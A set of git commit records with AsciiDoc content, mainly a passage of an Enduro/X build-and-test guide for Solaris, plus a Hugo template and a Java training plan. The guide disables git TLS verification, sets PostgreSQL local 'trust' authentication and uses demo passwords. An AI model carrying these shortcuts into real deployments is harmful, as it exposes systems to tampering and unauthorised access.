pkg list -af 'pkg:\/\/solarisstudio\/developer\/solarisstudio-124\/*'\n\n# pkg install -nv solarisstudio-124\n\n# pkg install solarisstudio-124\n---------------------------------------------------------------------\n\nIf plan to run \n\n=== If installing Sun Studio (on Solaris 10)...\n\nFirstly download the \"tarfile\" version from Oracle, visit \nhttp:\/\/www.oracle.com\/technetwork\/server-storage\/solarisstudio\/downloads\/tarfiles-studio-12-4-3048109.html\n\nNext once the tar file is on your server, extract it and start the install:\n\n---------------------------------------------------------------------\n# bzip2 -d SolarisStudio12.4-solaris-x86-bin.tar.bz2\n# tar -xf SolarisStudio12.4-solaris-x86-bin.tar\n# cd SolarisStudio12.4-solaris-x86-bin\n# .\/install_patches.sh\n# mv solarisstudio12.4 \/opt\n---------------------------------------------------------------------\n\nFor Solaris 10 also we need gmake to work as \"make\", thus\n---------------------------------------------------------------------\n# ln -s \/opt\/csw\/bin\/gmake \/usr\/bin\/make\n---------------------------------------------------------------------\n\nThis will put the compiler in \"\/opt\/solarisstudio12.4\" the path later used in\nthis tutorial.\n\nAlso for solaris 10 we need \"ar\" tool which we will use from GNU package:\n\n---------------------------------------------------------------------\n# \/opt\/csw\/bin\/pkgutil -y -i gcc4core gcc4g++\n---------------------------------------------------------------------\n\n== Getting the source code\n\nFirstly we need to add \"user1\" under which we will perform build actions.\nFor test purposes we will parepare new user for which Enduro\/X will built \n(this adds the in the path the \/opt\/csw\/bin. You may modify that of your needs.\n(add \/opt\/solarisstudio12.4\/bin if Sun studio is installed)\n\n=== Adding user on Solaris 11\nWe add the user \"user1\" and also set the open file limit to 4096, by\ndefault it is 256 which is too low for unit testing.\n\n---------------------------------------------------------------------\n$ su - root\n# useradd -m user1\n# passwd user1\n# projadd -K \"process.max-file-descriptor=(basic,10000,deny)\" enduroxproject\n# usermod -K \"project=enduroxproject\" user1\n# su - user1\n---------------------------------------------------------------------\n\n=== Adding user on Solaris 10\n\n---------------------------------------------------------------------\n$ su - root\n# useradd -d \\$HOME -m -s \/usr\/bin\/bash -c \"User1 User1\" user1\n# mkdir \\$HOME\n# chown user1:staff \\$HOME\n# su - user1\n---------------------------------------------------------------------\n\n=== Preparing the user environment\n\n---------------------------------------------------------------------\n\n$ bash\n$ cat << EOF >> .profile\nexport PATH=$PATH:\/opt\/csw\/bin:\/opt\/solarisstudio12.4\/bin\nEOF\n$ chmod +x .profile\n$ source .profile\n$ cd \\$HOME\n$ GIT_SSL_NO_VERIFY=true git clone https:\/\/github.com\/endurox-dev\/endurox\n$ cd endurox \n$ git config http.sslVerify \"false\"\n---------------------------------------------------------------------\n\n=== Enduro\/X basic Environment configuration for HOME directory\n\nThis code bellow creates 'ndrx_home' executable file which loads basic environment, \nso that you can use sample configuration provided by Enduro\/X in 'sampleconfig' directory. \nThis also assumes that you are going to install to '$HOME\/endurox\/dist' folder.\nThe file bellow will override the sample configuration.\n\n---------------------------------------------------------------------\n$ cat << EOF > $HOME\/ndrx_home\n#!\/bin\/bash\n\necho \"Loading ndrx_home...\"\n# Where app domain lives\nexport NDRX_APPHOME=$HOME\/endurox\n# Where NDRX runtime lives\nexport NDRX_HOME=\\$HOME\/endurox\/dist\/bin\n# Debug config too\nexport NDRX_DEBUG_CONF=\\$HOME\/endurox\/sampleconfig\/debug.conf\n# NDRX config too.\nexport NDRX_CONFIG=\\$HOME\/endurox\/sampleconfig\/ndrxconfig.xml\n\nexport FLDTBLDIR=\\$HOME\/endurox\/ubftest\/ubftab\n\nexport PATH=\/usr\/bin:\/usr\/sbin:\/opt\/csw\/bin:\/opt\/solarisstudio12.4\/bin:\/opt\/csw\/bin:\\$HOME\/endurox\/dist\/bin\nexport LD_LIBRARY_PATH=\/usr\/lib\/sparcv9:\\$HOME\/endurox\/dist\/lib64:\/opt\/solarisstudio12.4\/lib:\/usr\/lib64:\/opt\/csw\/lib\/64\n\n################################################################################\n# In case if building with Postgresql DB database testing support\n# or building endurox-java with Oracle DB tests (03_xapostgres), then\n# configure bellow setting (demo values provided):\n# If so - uncomment bellow\n################################################################################\n#export EX_PG_HOST=localhost\n#export EX_PG_USER=exdbtest\n#export EX_PG_PASS=exdbtest1\n# currently uses default port\n#export EX_PG_PORT=5432\n#export EX_PG_DB=xe\n\n#\n# If using PostgreSQL for Solaris 11 uncomment:\n#\n#export PATH=$PATH:\/opt\/csw\/libexec\/postgresql\/93\n\n\nEOF\n\n$ chmod +x $HOME\/ndrx_home\n---------------------------------------------------------------------\n\n=== Configuring PostgreSQL\n\nIf Enduro\/X PostgreSQL driver is needed to be build for AIX, the PostgreSQL\nneeds to be installed for build and test purposes. On Solaris 10, PostgreSQL\ncomes with the operating system, thus only access rights and users needs to be\nconfigured.\n\nNote if you plan to use ECPG mode, then ecpg pre-compiler needs to know where\nthe ecpg libraries live. Thus LD_LIBRARY_PATH must be set during the build time.\n\nIt can be done in following way:\n\n--------------------------------------------------------------------------------\n\n# su - user1\n$ cat << EOF >> .profile\nexport LD_LIBRARY_PATH=\/opt\/csw\/lib\/amd64\nEOF\n\n--------------------------------------------------------------------------------\n\nafter this login and log out from user1 to apply the .profile settings.\n\nAlso to active the PostgreSQL inclusion to the build, add *-DENABLE_POSTGRES=ON*\nflag to cmake command line (later in build section).\n\nFor Solaris 11 it needs to be installed:\n\n--------------------------------------------------------------------------------\n\n$ su - root\n\n-- Install with:\n# \/opt\/csw\/bin\/pkgutil -y -i postgresql93\n\n-- Install dev\n# \/opt\/csw\/bin\/pkgutil -y -i postgresql_dev\n\n-- enable for auto start\n# svcadm enable cswpostgresql-93\n\n# su - postgres\n\n-- Create profile entry to have path to postgres binaries\n\n$ cat << EOF > ~\/.profile\n\n#!\/bin\/bash\n\nexport PATH=$PATH:\/opt\/csw\/libexec\/postgresql\/93\/\n\nEOF\n\n$ chmod +x ~\/.profile\n\n-- Start postgres from Postgres user\n$ \/opt\/csw\/bin\/pg_ctl-93 -D \/var\/opt\/csw\/postgresql\/93 -l logfile start\nserver starting \n\n\n\n--------------------------------------------------------------------------------\n\nFor Solaris 10, just enable it:\n\n--------------------------------------------------------------------------------\n\n$ su - root\n# svcadm enable svc:\/application\/database\/postgresql:version_82\n\n--------------------------------------------------------------------------------\n\nNow create the database for Enduro\/X tests (Solaris 10 & 11):\n\n--------------------------------------------------------------------------------\n# su - postgres\n\n$ createuser exdbtest\n\n$ createdb xe\n\n$ psql -d template1\n\n> alter user exdbtest with encrypted password 'exdbtest1';\n> grant all privileges on database xe to exdbtest;\n> \\q\n\n--------------------------------------------------------------------------------\n\nConfiguration files needs to be updated for authentication and distributed\ntransactions must be enabled too.\n\nEdit *postgresql.conf*, set \"max_prepared_transactions\"\nto 1000.\n\nSolaris 10: *\/var\/postgres\/8.2\/data\/postgresql.conf*\n\nSolaris 11(.4): *\/var\/opt\/csw\/postgresql\/93\/postgresql.conf*\n\n--------------------------------------------------------------------------------\n\nmax_prepared_transactions = 1000 # zero disables the feature\n\n--------------------------------------------------------------------------------\n\nFor access permissions and network configuration, update \n*pg_hba.conf*, so that it contains following:\n\nSolaris 10: *\/var\/postgres\/8.2\/data\/pg_hba.conf*\n\nSolaris 11: *\/var\/opt\/csw\/postgresql\/93\/pg_hba.conf*\n\n--------------------------------------------------------------------------------\n\nlocal all all trust\nhost all all 127.0.0.1\/32 md5\nhost all all ::1\/128 md5\n\n--------------------------------------------------------------------------------\n\nRestart PostgreSQL, Solaris 10:\n\n--------------------------------------------------------------------------------\n\n# svcadm restart svc:\/application\/database\/postgresql:version_82\n\n--------------------------------------------------------------------------------\n\nRestart PostgreSQL, Solaris 11:\n\n--------------------------------------------------------------------------------\n\n# svcadm restart cswpostgresql-93\n\n--------------------------------------------------------------------------------\n\n== Building the code with GCC\n\nIt is assumed that gcc is default compiler on the system (i.e. Oracle Studio not installed), \nthus following cmake will pick up gcc by default:\n\n=== Solaris 11\n\n---------------------------------------------------------------------\n$ cd \\$HOME\/endurox\n$ cmake -DCMAKE_CXX_COMPILER=g++ -DCMAKE_C_COMPILER=gcc\\\n-DDEFINE_DISABLEDOC=ON -DDEFINE_DISABLEGPGME=ON -DCMAKE_INSTALL_PREFIX:PATH=`pwd`\/dist -DCMAKE_LIBRARY_PATH=\/opt\/csw\/lib\/amd64 .\n$ make \n$ make install\n---------------------------------------------------------------------\n\n=== Solaris 10\n\nAlso note that CC variable needs to be exported as it is used by \nbuildclient script for view test cases.\n\n---------------------------------------------------------------------\n$ export CC=gcc\n$ cd \\$HOME\/endurox\n$ cmake -D CMAKE_AR=\/opt\/csw\/gnu\/ar -DCMAKE_CXX_COMPILER=g++ -DCMAKE_C_COMPILER=gcc \\\n-DDEFINE_DISABLEDOC=ON -DDEFINE_DISABLEGPGME=ON -DCMAKE_INSTALL_PREFIX:PATH=`pwd`\/dist .\n$ make \n$ make install\n---------------------------------------------------------------------\n\n\n== Building the code with Solaris Studio\n\nThe compilation will be done in 64bit mode\n\n=== Solaris 11\n\n---------------------------------------------------------------------\n$ cd \\$HOME\/endurox\n$ cmake -DCMAKE_INSTALL_PREFIX:PATH=`pwd`\/dist -DDEFINE_DISABLEGPGME=ON -DDEFINE_DISABLEDOC=ON .\n---------------------------------------------------------------------\n\nIn case if errors like\n\n---------------------------------------------------------------------\nld: fatal: file \/usr\/lib\/values-xpg6.o: wrong ELF class: ELFCLASS32\n---------------------------------------------------------------------\n\nappears, temporary solution is to replace that particular file with 64bit version.\nIt appears that Solaris Studio compiler ignores the \"-m64\" architecture flags\nand does not use \"\/usr\/lib\/amd64\/values-xpg6.o\" where it requires.\n\n---------------------------------------------------------------------\n# su - root\n# mv \/usr\/lib\/values-xpg6.o \/usr\/lib\/values-xpg6.o.OLD\n# ln -s \/usr\/lib\/amd64\/values-xpg6.o \/usr\/lib\/values-xpg6.o\n---------------------------------------------------------------------\n\n=== Solaris 10 (NOT SUPPORTED)\n\nThis assumes that GCC is installed, and \"ar\" from gcc will be used.\n\n---------------------------------------------------------------------\n$ cd \\$HOME\/endurox\n$ cmake -D CMAKE_AR=\/opt\/csw\/gnu\/ar \\\n-DCMAKE_INSTALL_PREFIX:PATH=`pwd`\/dist -DDEFINE_DISABLEGPGME=ON -DDEFINE_DISABLEDOC=ON .\n---------------------------------------------------------------------\n\nThe support is not available for Solaris Studio on Solaris 10 due\nto Thread Local Storage errors like during the linking:\n\n---------------------------------------------------------------------\nld: fatal: relocation error: R_SPARC_TLS_LDO_LOX10: file CMakeFiles\/nstd.dir\/ndebug.c.o: symbol $XBaBAqASPv3bHaz.__ndrx_debug__.first: bound to: CMakeFiles\/nstd.dir\/ndebug.c.o: relocation illegal when not bound to object being created\nld: fatal: relocation error: R_SPARC_TLS_LDO_ADD: file CMakeFiles\/nstd.dir\/ndebug.c.o: symbol $XBaBAqASPv3bHaz.__ndrx_debug__.first: bound to: CMakeFiles\/nstd.dir\/ndebug.c.o: relocation illegal when not bound to object being created\nld: fatal: relocation error: R_SPARC_TLS_LDO_HIX22: file CMakeFiles\/nstd.dir\/ndebug.c.o: symbol $XBaBAqASPv3bHaz.__ndrx_debug__.ostid: bound to: CMakeFiles\/nstd.dir\/ndebug.c.o: relocation illegal when not bound to object being created\nld: fatal: relocation error: R_SPARC_TLS_LDO_LOX10: file CMakeFiles\/nstd.dir\/ndebug.c.o: symbol $XBaBAqASPv3bHaz.__ndrx_debug__.ostid: bound to: CMakeFiles\/nstd.dir\/ndebug.c.o: relocation illegal when not bound to object being created\nld: fatal: relocation error: R_SPARC_TLS_LDO_ADD: file CMakeFiles\/nstd.dir\/ndebug.c.o: symbol $XBaBAqASPv3bHaz.__ndrx_debug__.ostid: bound to: CMakeFiles\/nstd.dir\/ndebug.c.o: relocation illegal when not bound to object being created\nld: fatal: relocation error: R_SPARC_TLS_LDO_HIX22: file CMakeFiles\/nstd.dir\/ndebug.c.o: symbol $XBaBAqASPv3bHaz.__ndrx_debug__.ostid: bound to: CMakeFiles\/nstd.dir\/ndebug.c.o: relocation illegal when not bound to object being created\nld: fatal: relocation error: R_SPARC_TLS_LDO_LOX10: file CMakeFiles\/nstd.dir\/ndebug.c.o: symbol $XBaBAqASPv3bHaz.__ndrx_debug__.ostid: bound to: CMakeFiles\/nstd.dir\/ndebug.c.o: relocation illegal when not bound to object being created\nld: fatal: relocation error: R_SPARC_TLS_LDO_ADD: file CMakeFiles\/nstd.dir\/ndebug.c.o: symbol $XBaBAqASPv3bHaz.__ndrx_debug__.ostid: bound to: CMakeFiles\/nstd.dir\/ndebug.c.o: relocation illegal when not bound to object being created\n---------------------------------------------------------------------\n\nThus at this time only GCC is supported for Solaris 10.\n\n\n== Building the code\n\n---------------------------------------------------------------------\n$ cd \\$HOME\/endurox\n$ make \n$ make install\n---------------------------------------------------------------------\n\nThis will produce binaries in '\\$HOME\/endurox\/dist' folder.\n\n== Unit Testing\n\nEnduro\/X basically consists of two parts:\n. XATMI runtime;\n. UBF\/FML buffer processing. \nEach of these two sub-systems have own units tests.\n\n=== UBF\/FML Unit testing\n\n---------------------------------------------------------------------\n$ cd \\$HOME\/endurox\/sampleconfig\n$ source setndrx\n$ cd \\$HOME\/endurox\/ubftest\n$ .\/ubfunit1 2>\/dev\/null\nRunning \"main\" (76 tests)...\nCompleted \"ubf_basic_tests\": 198 passes, 0 failures, 0 exceptions.\nCompleted \"ubf_Badd_tests\": 225 passes, 0 failures, 0 exceptions.\nCompleted \"ubf_genbuf_tests\": 334 passes, 0 failures, 0 exceptions.\nCompleted \"ubf_cfchg_tests\": 2058 passes, 0 failures, 0 exceptions.\nCompleted \"ubf_cfget_tests\": 2232 passes, 0 failures, 0 exceptions.\nCompleted \"ubf_fdel_tests\": 2303 passes, 0 failures, 0 exceptions.\nCompleted \"ubf_expr_tests\": 3106 passes, 0 failures, 0 exceptions.\nCompleted \"ubf_fnext_tests\": 3184 passes, 0 failures, 0 exceptions.\nCompleted \"ubf_fproj_tests\": 3548 passes, 0 failures, 0 exceptions.\nCompleted \"ubf_mem_tests\": 4438 passes, 0 failures, 0 exceptions.\nCompleted \"ubf_fupdate_tests\": 4613 passes, 0 failures, 0 exceptions.\nCompleted \"ubf_fconcat_tests\": 4768 passes, 0 failures, 0 exceptions.\nCompleted \"ubf_find_tests\": 5020 passes, 0 failures, 0 exceptions.\nCompleted \"ubf_get_tests\": 5247 passes, 0 failures, 0 exceptions.\nCompleted \"ubf_print_tests\": 5655 passes, 0 failures, 0 exceptions.\nCompleted \"ubf_macro_tests\": 5666 passes, 0 failures, 0 exceptions.\nCompleted \"ubf_readwrite_tests\": 5764 passes, 0 failures, 0 exceptions.\nCompleted \"ubf_mkfldhdr_tests\": 5770 passes, 0 failures, 0 exceptions.\nCompleted \"main\": 5770 passes, 0 failures, 0 exceptions.\n\n---------------------------------------------------------------------\n\n=== XATMI Unit testing\nATMI testing might take some time. Also ensure that you have few Gigabytes of free \ndisk space, as logging requires some space (about ~10 GB).\n\n---------------------------------------------------------------------\n$ cd \\$HOME\/endurox\/atmitest\n$ nohup .\/run.sh &\n$ tail -f \\$HOME\/endurox\/atmitest\/test.out\n...\n************ FINISHED TEST: [test028_tmq\/run.sh] with 0 ************\nCompleted \"atmi_test_all\": 28 passes, 0 failures, 0 exceptions.\nCompleted \"main\": 28 passes, 0 failures, 0 exceptions.\n---------------------------------------------------------------------\n\n== Troubleshooting\n\nThis section lists some notes about fixing most common problems with Solaris build.\n\n=== Problems with library modes\n\nIf having issues with linking particular library version, for example building\nin 64bit mode, but for some reason CMake is linking with 32bit libs (for example\nwith PostgreSQL), then following flag may be applied *CMAKE_LIBRARY_PATH* to\npoint to correct path for libraries. For example:\n\n---------------------------------------------------------------------\n$ cmake -DCMAKE_INSTALL_PREFIX:PATH=`pwd`\/dist -DDEFINE_DISABLEDOC=ON\\\n -DENABLE_POSTGRES=ON -DDEFINE_DISABLEGPGME=ON -DCMAKE_LIBRARY_PATH=\/opt\/csw\/lib\/amd64 .\n---------------------------------------------------------------------\n\n== Conclusions\n\nAt finish you have a configured system which is read to process the transactions\nby Enduro\/X runtime. It is possible to copy the binary version ('dist') folder\nto other same architecture machines and run it there with out need of building.\n\n:numbered!:\n\n[bibliography]\nAdditional documentation \n------------------------\nThis section lists additional related documents.\n\n[bibliography]\n.Resources\n- [[[BINARY_INSTALL]]] See Enduro\/X 'binary_install' manual.\n\n\n\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\nThe index is normally left completely empty, it's contents being\ngenerated automatically by the DocBook toolchain.\n\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\/\n","returncode":0,"stderr":"","license":"agpl-3.0","lang":"AsciiDoc"} {"commit":"dff7bdd0523a4d879327836c3ad1a2c7c7d62a05","subject":"Add markdown-to-asciidoc template","message":"Add markdown-to-asciidoc template\n\nThis is a very simple hackish regexp-based implementation, but works for\nthe simple formatting used by the current and past versions of the\ncovenant.\n\nI've gone ahead and manually checked all languages and versions and all\nseem to be correctly converted to asciidoc. Wohoo!\n","repos":"CoralineAda\/contributor_covenant","old_file":"layouts\/version\/single.adoc","new_file":"layouts\/version\/single.adoc","new_contents":"{{- \/*\nVery hacky way of converting markdown to asciidoc.\nBecause the covenant uses rather simple syntax, we can get away with this :)\n\nOrder of operations is:\n* Replace markdown # headers for = asciidoc\n* Transform links in the form of [text][reference] to text + remove reference links at end.\n This is similar to what the txt conversion does, and it's very hard to convert with just regexps -- if we want to\n keep these links it'll probably be easier to just convert them to [text](url) format.\n* Transform links in the form of [text](url) to asciidoc's link:url[text]\n* Transform links in the <url> form to asciidoc's link:url[url]\n\n*\/ -}}\n{{ .RawContent | replaceRE \"#\" \"=\" | replaceRE \"\\\\[([^\\\\]]*)\\\\][ \\\\n]*\\\\[[^\\\\]]*\\\\]\" \"$1\" | replaceRE \"\\\\[[^\\\\]]*\\\\]: .*\" \"\" | replaceRE \"\\\\[([^\\\\]]*)\\\\]\\\\((https{0,1}:.*)\\\\)\" \"link:$2[$1]\" | replaceRE \"<(https{0,1}:.*)>\" \"link:$1[$1]\" | safeHTML }}\n","old_contents":"Hello, world!\n","returncode":0,"stderr":"","license":"mit","lang":"AsciiDoc"} {"commit":"b13200096e5873674d91b950a12566ccfccd86d4","subject":"feat(plan): add links in day1 schedule","message":"feat(plan): add links in day1 schedule\n","repos":"arnauldvm\/jpt-course","old_file":"src\/main\/adoc\/0-extra\/1-training_plan.adoc","new_file":"src\/main\/adoc\/0-extra\/1-training_plan.adoc","new_contents":"\/\/ build_options: \nJava Performance Tuning - Training Plan\n=======================================\nArnauld Van Muysewinkel <avm@pendragon.be>\nv1.0, 15-Nov-2015: First complete version\n:backend: slidy\n\/\/:theme: volnitsky\n:data-uri:\n:copyright: Creative-Commons-Zero (Arnauld Van Muysewinkel)\n:br: pass:[<br>]\n\n\nDay 1 - AM\n----------\n\n*****\nWriting performance tests\n*****\n\n* link:..\/1-intro\/0-introduction.html#_introduction_to_the_course[Introduction]\n* _link:..\/1-intro\/w0-install.html#_content[Workshop 0: install the training toolsuite]_\n\n* link:..\/2-benchmark\/1-benchmark_design.html#_rtri_anatomy_of_a_test[Designing your benchmarks]: Anatomy of a test\n\n* link:..\/2-benchmark\/2-benchmark_tool.html#_content[Benchmarking tools]:\n** Basics (Injector, Market overview, Threading model, Back-pressure)\n** Introduction to JMeter\n\n* _link:..\/2-benchmark\/w1-first_benchmark.html#_content[Workshop 1: write your first performance tests]_\n\n* link:..\/4-process\/0-perf_test_process.html#_content[Performance testing process]\n\nDay 1 - PM\n----------\n\n*****\nWriting performance tests (cont'd)\n*****\n\n* link:..\/2-benchmark\/1-benchmark_design.html#_rtri_introduction[Designing your benchmarks]:\n** Planning your test\n** Load profiles\n** Metrics\n\n* link:..\/2-benchmark\/2-benchmark_tool.html#_jmeter_expressions_amp_functions[Benchmarking tools]:\n** JMeter: expressions & functions, shell\n** becoming en expert: randomization, data analysis, mock-ups\n\n* _Workshop 2: wrap up your performance tests_\n\n\nDay 2 - AM\n----------\n\n*****\nInvestigating performance issues\n*****\n\n* Performance Diagnostic Model (PDM): Introduction{br} \n* ⌖ Reminder about OSes internals (scheduling...)\n* PDM: Layer 1 (OS)\n* OS Monitoring tools\n* _Workshop 3 (interactive): PDM Layer 1 (OS) in practice_\n\n\nDay 2 - PM\n----------\n\n*****\nInvestigating performance issues (cont'd)\n*****\n\n* PDM: Layer 2 (JVM)\n* ⌖ Reminder of some JVM internals (GC, JIT...)\n* JVM Monitoring tools\n* _Workshop 4 (interactive): PDM Layer 2 (JVM) in practice_\n\n\nDay 3 - AM\n----------\n\n*****\nInvestigating performance issues (cont'd)\n*****\n\n* PDM: Layer 3 (Application)\n* Application Monitoring tools\n* _Workshop 5 (interactive): PDM Layer 3 (Application) in practice_\n\n\nDay 3 - PM\n----------\n\n*****\nGoing further\n*****\n\n* Other analysis tools (RG, Excel, R, ELK...)\n* _Workshop 6: Using the Report Generator (beta)_ (?)\n\/\/ Is it feasible to share the RG with a broader audience?\n* Introduction to Hyperion (?)\n* Best Practices (JSF, JPA, SQL...)\n* Web front-end performance (?)\n\n\nPresentations\n-------------\n\n* link:..\/1-intro\/0-introduction.html#_content[Introduction]\n* link:..\/1-intro\/1-objectives.html#_content[Objectives]\n* link:..\/2-benchmark\/1-benchmark_design.html#_content[Designing your benchmarks]\n* link:..\/2-benchmark\/2-benchmark_tool.html#_content[Benchmarking tools]\n* link:..\/3-pdm\/0-pdm_intro.html#_content[Performance Diagnostic Model (introduction)]\n* link:..\/3-pdm\/1-pdm_l1-os.html#_content[PDM Layer 1: Operating System]\n* link:..\/3-pdm\/2-pdm_l2-jvm.html#_content[PDM Layer 2: Java Virtual Machine]\n* link:..\/3-pdm\/3-pdm_l3-app.html#_content[PDM Layer 3: Application]\n* link:..\/4-process\/0-perf_test_process.html#_content[Performance Testing Process]\n* link:..\/5-analysis\/1-analysis_tools.html#_content[Analysis Tools]\n\n\nWorkshops\n---------\n\n* link:..\/1-intro\/w0-install.html#_content[Install the training toolsuite]\n* link:..\/2-benchmark\/w1-first_benchmark.html#_content[First performance test]\n* link:..\/2-benchmark\/w2-wrapup_benchmark.html#_content[Wrap-up the performance test]\n* link:..\/3-pdm\/w3-dominant_os.html#_content[PDM Layer 1 (OS) in practice]\n* link:..\/3-pdm\/w4-dominant_jvm.html#_content[PDM Layer 2 (JVM) in practice]\n* link:..\/3-pdm\/w5-dominant_app.html#_content[PDM Layer 3 (Application) in practice]\n\n\nExtras\n------\n\n* link:..\/0-extra\/0-course_description.html#_content[Course Description]\n* link:..\/0-extra\/1-training_plan.html#_content[Course Plan]\n* link:..\/0-extra\/2-internals_os.html#_content[Operating Systems Internals]\n* link:..\/0-extra\/3-internals_jvm.html#_content[Java VM Internals]\n* link:..\/0-extra\/4-best_practices.html#_content[Best Practices]\n","old_contents":"\/\/ build_options: \nJava Performance Tuning - Training Plan\n=======================================\nArnauld Van Muysewinkel <avm@pendragon.be>\nv1.0, 15-Nov-2015: First complete version\n:backend: slidy\n\/\/:theme: volnitsky\n:data-uri:\n:copyright: Creative-Commons-Zero (Arnauld Van Muysewinkel)\n:br: pass:[<br>]\n\n\nDay 1 - AM\n----------\n\n*****\nWriting performance tests\n*****\n\n* Introduction\n* _Workshop 0: install training toolsuite_\n* Anatomy of a test\n* Benchmarking tool: basics\n* _Workshop 1: write your first performance tests_\n\n\n* Performance testing process\n\nDay 1 - PM\n----------\n\n*****\nWriting performance tests (cont'd)\n*****\n\n* Planning your test\n* Load profiles\n* Metrics\n* Benchmarking tool: threading model, timers\n* Benchmarking tool: parameters\n* _Workshop 2: wrap up your performance tests_\n\n\nDay 2 - AM\n----------\n\n*****\nInvestigating performance issues\n*****\n\n* Performance Diagnostic Model (PDM): Introduction{br} \n* ⌖ Reminder about OSes internals (scheduling...)\n* PDM: Layer 1 (OS)\n* OS Monitoring tools\n* _Workshop 3 (interactive): PDM Layer 1 (OS) in practice_\n\n\nDay 2 - PM\n----------\n\n*****\nInvestigating performance issues (cont'd)\n*****\n\n* PDM: Layer 2 (JVM)\n* ⌖ Reminder of some JVM internals (GC, JIT...)\n* JVM Monitoring tools\n* _Workshop 4 (interactive): PDM Layer 2 (JVM) in practice_\n\n\nDay 3 - AM\n----------\n\n*****\nInvestigating performance issues (cont'd)\n*****\n\n* PDM: Layer 3 (Application)\n* Application Monitoring tools\n* _Workshop 5 (interactive): PDM Layer 3 (Application) in practice_\n\n\nDay 3 - PM\n----------\n\n*****\nGoing further\n*****\n\n* Other analysis tools (RG, Excel, R, ELK...)\n* _Workshop 6: Using the Report Generator (beta)_ (?)\n\/\/ Is it feasible to share the RG with a broader audience?\n* Introduction to Hyperion (?)\n* Best Practices (JSF, JPA, SQL...)\n* Web front-end performance (?)\n\n\nPresentations\n-------------\n\n* link:..\/1-intro\/0-introduction.html#_content[Introduction]\n* link:..\/1-intro\/1-objectives.html#_content[Objectives]\n* link:..\/2-benchmark\/1-benchmark_design.html#_content[Designing your benchmarks]\n* link:..\/2-benchmark\/2-benchmark_tool.html#_content[Benchmarking tools]\n* link:..\/3-pdm\/0-pdm_intro.html#_content[Performance Diagnostic Model (introduction)]\n* link:..\/3-pdm\/1-pdm_l1-os.html#_content[PDM Layer 1: Operating System]\n* link:..\/3-pdm\/2-pdm_l2-jvm.html#_content[PDM Layer 2: Java Virtual Machine]\n* link:..\/3-pdm\/3-pdm_l3-app.html#_content[PDM Layer 3: Application]\n* link:..\/4-process\/0-perf_test_process.html#_content[Performance Testing Process]\n* link:..\/5-analysis\/1-analysis_tools.html#_content[Analysis Tools]\n\n\nWorkshops\n---------\n\n* link:..\/1-intro\/w0-install.html#_content[Install the training toolsuite]\n* link:..\/2-benchmark\/w1-first_benchmark.html#_content[First performance test]\n* link:..\/2-benchmark\/w2-wrapup_benchmark.html#_content[Wrap-up the performance test]\n* link:..\/3-pdm\/w3-dominant_os.html#_content[PDM Layer 1 (OS) in practice]\n* link:..\/3-pdm\/w4-dominant_jvm.html#_content[PDM Layer 2 (JVM) in practice]\n* link:..\/3-pdm\/w5-dominant_app.html#_content[PDM Layer 3 (Application) in practice]\n\n\nExtras\n------\n\n* link:..\/0-extra\/0-course_description.html#_content[Course Description]\n* link:..\/0-extra\/1-training_plan.html#_content[Course Plan]\n* link:..\/0-extra\/2-internals_os.html#_content[Operating Systems Internals]\n* link:..\/0-extra\/3-internals_jvm.html#_content[Java VM Internals]\n* link:..\/0-extra\/4-best_practices.html#_content[Best Practices]\n","returncode":0,"stderr":"","license":"cc0-1.0","lang":"AsciiDoc"} {"commit":"e09b28941f283ea5463bc7c915a7142026b58ade","subject":"HBASE-13554 Clarify release versioning policy.","message":"HBASE-13554 Clarify release versioning policy.\n\nHBase is not following the strictness of SemVer, so\nmake sure we correctly advertise this. Document the\nedge-case where APIs may be added in patch-releases.\n\nSigned-off-by: Sean Busbey <5c0191c5bda2836af1cb87878694cfbf1db676c8@apache.org>\n","repos":"Eshcar\/hbase,Eshcar\/hbase,ultratendency\/hbase,gustavoanatoly\/hbase,andrewmains12\/hbase,bijugs\/hbase,lshmouse\/hbase,ultratendency\/hbase,gustavoanatoly\/hbase,francisliu\/hbase,JingchengDu\/hbase,Eshcar\/hbase,gustavoanatoly\/hbase,SeekerResource\/hbase,ultratendency\/hbase,ultratendency\/hbase,Eshcar\/hbase,francisliu\/hbase,SeekerResource\/hbase,lshmouse\/hbase,Apache9\/hbase,bijugs\/hbase,juwi\/hbase,ndimiduk\/hbase,SeekerResource\/hbase,Apache9\/hbase,gustavoanatoly\/hbase,SeekerResource\/hbase,lshmouse\/hbase,JingchengDu\/hbase,lshmouse\/hbase,vincentpoon\/hbase,narendragoyal\/hbase,JingchengDu\/hbase,Apache9\/hbase,ultratendency\/hbase,bijugs\/hbase,Eshcar\/hbase,HubSpot\/hbase,andrewmains12\/hbase,Eshcar\/hbase,ChinmaySKulkarni\/hbase,lshmouse\/hbase,andrewmains12\/hbase,gustavoanatoly\/hbase,Eshcar\/hbase,mahak\/hbase,lshmouse\/hbase,andrewmains12\/hbase,lshmouse\/hbase,SeekerResource\/hbase,lshmouse\/hbase,Apache9\/hbase,mahak\/hbase,narendragoyal\/hbase,andrewmains12\/hbase,ChinmaySKulkarni\/hbase,ChinmaySKulkarni\/hbase,bijugs\/hbase,JingchengDu\/hbase,JingchengDu\/hbase,vincentpoon\/hbase,vincentpoon\/hbase,bijugs\/hbase,narendragoyal\/hbase,ChinmaySKulkarni\/hbase,ndimiduk\/hbase,francisliu\/hbase,francisliu\/hbase,lshmouse\/hbase,HubSpot\/hbase,andrewmains12\/hbase,Apache9\/hbase,apurtell\/hbase,apurtell\/hbase,apurtell\/hbase,mahak\/hbase,apurtell\/hbase,francisliu\/hbase,Eshcar\/hbase,lshmouse\/hbase,ChinmaySKulkarni\/hbase,gustavoanatoly\/hbase,bijugs\/hbase,HubSpot\/hbase,apurtell\/hbase,mahak\/hbase,SeekerResource\/hbase,HubSpot\/hbase,narendragoyal\/hbase,JingchengDu\/hbase,SeekerResource\/hbase,JingchengDu\/hbase,narendragoyal\/hbase,HubSpot\/hbase,Apache9\/hbase,apurtell\/hbase,HubSpot\/hbase,ultratendency\/hbase,Apache9\/hbase,mahak\/hbase,mahak\/hbase,gustavoanatoly\/hbase,ndimiduk\/hbase,juwi\/hbase,mahak\/hbase,ndimiduk\/hbase,narendragoyal\/hbase,juwi\/hbase,juwi\/hbase,Apache9\/hbase,gustavoa